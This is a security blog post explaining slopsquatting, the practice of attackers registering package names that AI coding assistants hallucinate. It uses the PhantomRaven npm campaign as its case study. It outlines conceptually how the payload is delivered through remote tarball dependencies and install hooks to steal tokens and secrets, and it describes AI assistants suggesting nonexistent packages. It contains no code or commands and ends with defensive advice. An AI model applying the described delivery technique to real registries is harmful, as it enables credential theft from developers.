BEYONDFEATURES
>Blog>About>Subscribe
>Blog>About>Subscribe

// subscribe

Weekly newsletter

DevTools, security, technical buyers — proof over soup. Full story → Subscribe

>

No spam. Unsubscribe anytime. ~1000 words weekly — DevTools, security, technical buyers.

BlogSubscribeSponsorLinkedInGitHub
BEYOND FEATURES

© 2026 Beyond Features

Satire at shared patterns, not the people. Same human behind this site.

Back to blog
securitysupply-chainai-agents

Slopsquatting: From Typos to AI Supply Chain Attacks

Slopsquatting turns AI package hallucinations into a new software supply chain attack path. PhantomRaven shows why this is now an active npm threat, not a theoretical one.

March 16, 20268 min readby Beatriz Datangel Rodgers

[!note] Key takeaway: clarity wins — make the value obvious in one scan.

Slopsquatting: From Typos to AI Supply Chain Attacks

Dark monitor code programming cyber workspace with colorful syntax highlighting

Photo by Jakub Żerdzicki on Unsplash

Asking an AI coding assistant for a package recommendation introduces a supply chain risk that used to require a human typo. No misspelling needed. The model invents the name, the developer trusts the suggestion, and the attacker is already waiting. That is slopsquatting, and it is why the technique matters.

Before AI, package attacks mostly depended on familiar mistakes: typoing a dependency name, trusting a fake domain, or installing a package that looked close enough to a real one. With slopsquatting, the attacker does not wait for the developer to make the naming mistake. The model makes it first. Then the attacker registers the invented package and waits for the developer to trust the suggestion.

That sounds like a small change. It is not. It means the package discovery layer inside the IDE, terminal, and chat window is now part of the software supply chain attack surface.

Figure 1: The slopsquatting kill chain — from prompt to payload.


The Pre-AI Version of This Problem

Software supply chain social engineering has always targeted trust shortcuts:

  • Phishing to steal maintainer or developer credentials
  • Domain squatting to host fake docs or downloads
  • Typosquatting to catch misspelled package installs
  • Dependency confusion to exploit registry resolution behavior

All four tactics work because developers move quickly. If a package name looks plausible and the install succeeds, it often gets the benefit of the doubt.

Slopsquatting belongs in that lineage. It is the same social engineering logic, but routed through model output instead of direct human error.

Figure 2: How software supply chain attacks have evolved.


Why AI Assistants Change the Economics

AI coding assistants — GitHub Copilot, Cursor, ChatGPT, Claude, Codeium — now give code suggestions in the IDE, support chat, and help from the command line. That is exactly why these tools create a new attack surface. They are not just writing functions. They are increasingly acting as package discovery engines.

The underlying model failure here is package hallucination: the assistant recommends a dependency that sounds legitimate but does not actually exist.

The USENIX analysis of package hallucinations shows this is not a niche problem:

MetricValue
Models tested16
Avg hallucination rate19.6%
Commercial models~5%
Open-source models~21%
Unique fake package names observed205,474
Repeated for same prompt~45%
Reappeared across 10 follow-up prompts~60%

That last point is the big one. If hallucinated names were one-off randomness, slopsquatting would be noisy and unreliable. But repeated hallucinations create predictable targets attackers can claim in public registries.

This is what makes slopsquatting more dangerous than simple typosquatting. The attacker is no longer guessing what a tired developer might mistype. They can watch what models repeatedly invent.


PhantomRaven Proves This Is Already Operational

The best case study is PhantomRaven.

Koi Security's original write-up described PhantomRaven in October 2025 as a campaign spanning 126 malicious npm packages and more than 86,000 downloads. The operation harvested npm tokens, GitHub credentials, and CI/CD secrets while hiding its payload in what Koi called "invisible dependencies."

A follow-up analysis in March 2026 tied three new waves to the same actor — and as of March 10, 2026, 81 of the 88 newly identified malicious packages were still available on npm, with 2 of 3 C2 servers still live.

That matters because PhantomRaven is not a one-off package compromise. It is a repeatable campaign with infrastructure, naming strategy, and evasion patterns.


How PhantomRaven Exploits the Same Trust Gap

PhantomRaven did not rely on random lookalikes. The actor targeted package names that developers — or models — would plausibly expect to exist. That is not proven to be AI-hallucination-driven, but it exploits the exact same trust gap slopsquatting weaponizes: if a name feels right in context, it gets installed.

  • Wave 2 focused heavily on GraphQL Codegen-style names, betting users would omit the @graphql-codegen/ scope prefix
  • Wave 3 shifted heavily toward Babel plugin names
  • Wave 4 targeted import/export utility names

That is slopsquatting in practice: registering packages that feel semantically correct in context, even if no legitimate package ever existed there before.

The attacker also paired the naming strategy with a technical delivery method built for evasion. npm's package.json documentation allows tarball URL dependencies, and npm's scripts documentation still supports lifecycle hooks like preinstall, install, and postinstall.

PhantomRaven used a technique researchers call Remote Dynamic Dependencies (RDD):

Figure 3: PhantomRaven's Remote Dynamic Dependency delivery mechanism.

The npm-hosted package looked mostly harmless. A dependency pointed to an attacker-controlled tarball URL, the real payload was fetched during install, and lifecycle hooks executed the malicious logic. That design is important because it lets malicious behavior live outside the package body most scanners inspect first.


What Makes Slopsquatting Different From Older Attacks

Slopsquatting introduces three problems older software supply chain social engineering did not have at the same scale.

1. The bad suggestion can come from a trusted workflow. The developer is not pulling a random package from a forum. The dependency appears inside the IDE or AI chat panel they already use every day.

2. The attack surface is generative. Models can produce a huge volume of plausible-sounding fake names across frameworks, languages, and package ecosystems.

3. The detection signal is weaker. A typo can look suspicious if you know the real package. A hallucinated name may look perfectly valid because it matches the code context.

TyposquattingSlopsquatting
Error sourceHuman typoModel hallucination
ScaleLimited by common misspellingsGenerative — unlimited plausible names
Trust signalNone — random installHigh — suggested by trusted AI tool
DetectionLevenshtein distance from real packageNo "real" package to compare against

Figure 4: Typosquatting vs. slopsquatting — side by side.

This is why slopsquatting should be treated as AI-mediated social engineering, not just rebranded typosquatting.


What Teams Should Do Now

The mitigation story is not "use less AI." It is "stop treating AI-suggested dependencies as pre-validated."

Security and platform teams should do seven things immediately:

  1. Review every new dependency introduced through AI-generated code.
  2. Flag tarball URLs, Git dependencies, and unexpected install hooks in package.json.
  3. Verify unfamiliar packages against official docs, maintainer history, and provenance signals before install.
  4. Enforce lockfile discipline — commit lockfiles, review lockfile diffs in PRs, and run npm audit signatures where available.
  5. Add policy checks in CI for risky dependency patterns, not just known CVEs. Consider registry allowlists for critical projects.
  6. Train developers that "the model suggested it" is not evidence that the package is legitimate.
  7. Push security tooling earlier into the workflow so suspicious package names are caught in the IDE or PR, not after they hit production.

The USENIX research also suggests a longer-term direction: fine-tuning and self-detection techniques can reduce hallucination rates. That is promising, but it is not a substitute for registry, CI, and developer-side controls.


The Bigger Shift

Pre-AI supply chain attacks exploited what developers typed. Slopsquatting exploits what models suggest.

That difference changes the economics of the attack. It gives attackers a scalable way to manufacture believable package names, register them cheaply, and wait inside normal development workflows.

PhantomRaven shows the threat is already live. The packages are real. The infrastructure is real. The attacker tradecraft is improving. Security teams that still think of package risk as a typo problem are defending the last generation of the attack.

The next generation starts with autocomplete.


Sources: USENIX package hallucination research · Koi Security PhantomRaven analysis · PhantomRaven follow-up (March 2026) · npm package.json docs · npm scripts docs

// related posts

Different name, same message: why vendor sameness is a GTM problem

4 min read

Security Is a Developer Experience Feature Now

5 min read